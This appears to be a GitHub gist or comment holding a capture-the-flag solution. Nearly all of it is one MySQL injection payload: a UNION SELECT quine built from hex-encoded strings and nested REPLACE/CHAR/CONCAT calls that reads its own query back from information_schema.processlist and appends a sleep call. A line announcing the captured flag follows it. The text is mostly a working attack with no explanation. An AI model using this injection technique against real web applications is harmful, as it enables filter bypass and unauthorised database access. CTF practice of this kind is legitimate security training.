union select 0x61646d696e,substr(info,72,length(info)-72),0x2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c41434528275c2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c414345282224222c43484152283334292c4348415228333929292c43484152283336292c222422292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e6523272c43484152283334292c4348415228333929292c43484152283336292c275c2720756e696f6e2073656c656374203078323732303735366536393666366532303733363536633635363337343230323837333635366336353633373432303733373536323733373437323238363936653636366632633333333632633663363536653637373436383238363936653636366632393264333333363239323036363732366636643230363936653636366637323664363137343639366636653566373336333638363536643631326537303732366636333635373337333663363937333734323037373638363537323635323036343632336436343631373436313632363137333635323832393230363136653634323036393634336436333666366536653635363337343639366636653566363936343238323932303663363936643639373432303331323932633230323837333635366336353633373432303633366636653633363137343238373337353632373337343732323836393665363636663263333733323263366336353665363737343638323836393665363636663239326433373335323932633330373833333331333233393332333332393230363637323666366432303639366536363666373236643631373436393666366535663733363336383635366436313265373037323666363336353733373336633639373337343230373736383635373236353230363936653636366632303663363936623635323033303738333233353336333933363334333236333337333033373337333236333337333433363636333636323336333533363635333233353230363136653634323037343639366436353566366437333365333332303663363936643639373432303331323932332c205245504c414345285245504c414345285245504c414345282224222c43484152283334292c4348415228333929292c43484152283336292c222422292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e652327292c434f4e4341542843484152283339292c4348415228333929292c434f4e4341542843484152283339292c43484152283932292c43484152283339292929204153205175696e6523 from information_schema.processlist where db=database() and id=connection_id() limit 1 union select 1,2,sleep(1)#
)
hooray!!! Flag is stypr_is_The_only_master_LOL_LOL_LOOL
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment